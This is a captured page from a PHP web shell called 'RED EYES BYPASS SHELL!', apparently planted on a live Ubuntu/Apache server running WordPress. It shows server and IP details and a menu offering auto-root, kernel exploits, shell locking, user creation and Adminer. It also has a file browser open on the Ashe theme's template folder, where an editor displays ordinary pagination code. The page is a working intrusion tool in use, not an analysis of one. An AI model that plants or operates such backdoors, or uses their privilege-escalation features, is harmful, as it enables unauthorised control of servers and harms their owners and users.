Linux sothorn202 5.15.0-164-generic #174-Ubuntu SMP Fri Nov 14 20:25:16 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
home /
sdgs /
wp-content /
themes /
ashe /
templates /
grid /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
blog-grid.php
4.04
KB
-rwxr-xr-x
blog-list.php
3.5
KB
-rwxr-xr-x
blog-pagination.php
2.05
KB
-rwxr-xr-x
category-description.php
381
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog-pagination.php
<?php global $paged; global $wp_query; $pages = $wp_query->max_num_pages; $range = 2; $showitems = ( $range * 2 ) + 1; $post_pagination = ashe_options( 'blog_page_post_pagination' ); if ( empty( $paged ) ) { $paged = 1; } if ( ! $pages ) { $pages = 1; } if ( $pages == 1 ) { return; } // Check for WooCommerce if ( class_exists( 'WooCommerce' ) ) { if ( is_shop() ) { $post_pagination = 'numeric'; } } ?> <nav class="blog-pagination clear-fix <?php echo esc_attr( $post_pagination ); ?>" data-max-pages="<?php echo esc_attr( $wp_query->max_num_pages ); ?>" data-loading="<?php esc_attr_e( 'Loading...', 'ashe' ); ?>" > <?php // Numeric Pagination if ( $post_pagination === 'numeric' ) { // Previous Page if ( $paged > 1 ) { echo '<a href="'. esc_url( get_pagenum_link( $paged - 1 ) ) .'" class="numeric-prev-page" ><i class="fa-solid fa-arrow-left-long"></i></a>'; } // Pagination for ( $i = 1; $i <= $pages; $i++ ) { if ( 1 != $pages &&( !( $i >= $paged + $range + 1 || $i <= $paged - $range - 1 ) || $pages <= $showitems ) ) { if ( $paged == $i ) { echo '<span class="numeric-current-page">'. $i .'</span>'; } else { echo '<a href="'. esc_url( get_pagenum_link( $i ) ). '">'. $i .'</a>'; } } } // Next Page if ( $paged < $pages ) { echo '<a href="'. esc_url( get_pagenum_link( $paged + 1 ) ).'" class="numeric-next-page" ><i class="fa-solid fa-arrow-right-long"></i></a>'; } // Default Pagination } elseif ( $post_pagination === 'default' ) { if ( get_next_posts_link() ) { echo '<div class="previous-page">'; next_posts_link( '<i class="fa-solid fa-arrow-left-long"></i> '.esc_html__( 'Older Posts', 'ashe' ) ); echo '</div>'; } if ( get_previous_posts_link() ) { echo '<div class="next-page">'; previous_posts_link( esc_html__( 'Newer Posts', 'ashe' ).' <i class="fa-solid fa-arrow-right-long"></i>' ); echo '</div>'; } // Load More / Infinite Scroll } else { next_posts_link( esc_html__( 'Load More', 'ashe' ) ); } ?> </nav>
Close